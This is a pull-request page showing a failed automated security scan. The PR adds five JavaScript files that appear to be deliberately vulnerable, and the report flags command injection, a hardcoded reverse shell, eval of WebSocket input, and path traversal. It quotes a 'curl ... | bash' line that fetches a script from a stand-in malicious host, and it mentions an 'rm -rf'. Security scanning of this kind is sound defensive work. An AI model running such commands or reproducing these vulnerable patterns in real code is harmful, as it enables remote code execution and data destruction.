added #13
Open
added #13
ZeroPath AI Staging / Security Check
failed
Nov 27, 2025 in 0s
Scan completed
Blocking issue(s) found.
Details
❌ Possible security or compliance issues detected. Reviewed everything up to ea24d94.
The following issues were found:
-
Command Injection
- Location: cli/index.js:1-18
- Score: CRITICAL (100.0)
- Description: Arbitrary shell execution and execution of a remote script. The code interpolates untrusted process.argv[2] into a shell command string and passes it to child_process.exec. Additionally it unconditionally runs
curl http://malicious.example.com/install.sh | bashand a destructiverm -rfas part of the same command pipeline. An attacker-controlled argv can inject shell metacharacters to execute arbitrary commands; the curl|bash pattern executes remote code immediately. - Link to UI: https://staging.branch.zeropath.com/app/issues/98a123c9-3b4d-48f5-876e-51d8904105cd
-
Remote Code Execution (RCE)
- Location: stdin/index.js:1-12
- Score: CRITICAL (100.0)
- Description: Immediate execution of a reverse shell command via child_process.exec with a hardcoded payload that opens a connection to an attacker-controlled host. This grants remote shell access and full control as the process user.
- Link to UI: https://staging.branch.zeropath.com/app/issues/e45891ac-9e1b-4a9d-b756-e71b75143910
-
Remote Code Execution (RCE)
- Location: ws/index.js:1-12
- Score: CRITICAL (100.0)
- Description: Remote code execution via eval of untrusted WebSocket messages. Incoming messages are passed directly to eval(msg) and executed in server context, allowing any connected client to execute arbitrary JavaScript with application privileges.
- Link to UI: https://staging.branch.zeropath.com/app/issues/51db9a27-9abf-4430-9876-e5715029491c
-
Path Traversal
- Location: disk/index.js:1-17
- Score: MEDIUM (73.0)
- Description: File disclosure / path traversal and symlink escape risk. The endpoint reads req.query.file and resolves it against __dirname, then uses a startsWith check to enforce containment. This exposes arbitrary files under the application dir; the startsWith containment check is brittle and can be bypassed using symlinks or platform path nuances, potentially disclosing sensitive files (configs, keys, .env).
- Link to UI: https://staging.branch.zeropath.com/app/issues/0a746183-e3a0-431d-8875-07361472320b
Security Overview
- 🔎 Scanned files: 5 changed file(s)
- 🔗 Scan Link: https://staging.branch.zeropath.com/app/repositories/3d073d9b-c32a-449c-bae6-4a30e267e43a?scanId=0102905b-0807-48f6-a72a-f080cdcaab8e&codeScanTypes=PrScan&tab=issues
Detected Code Changes
| Change Type | Relevant files |
|---|---|
| Other | ► cli/index.js File creation ► disk/index.js File creation ► package.json File creation ► stdin/index.js File creation ► ws/index.js File creation |
Reply to this PR with @zeropath-ai followed by a description of what change you want and we'll auto-submit a change to this PR to implement it.
Loading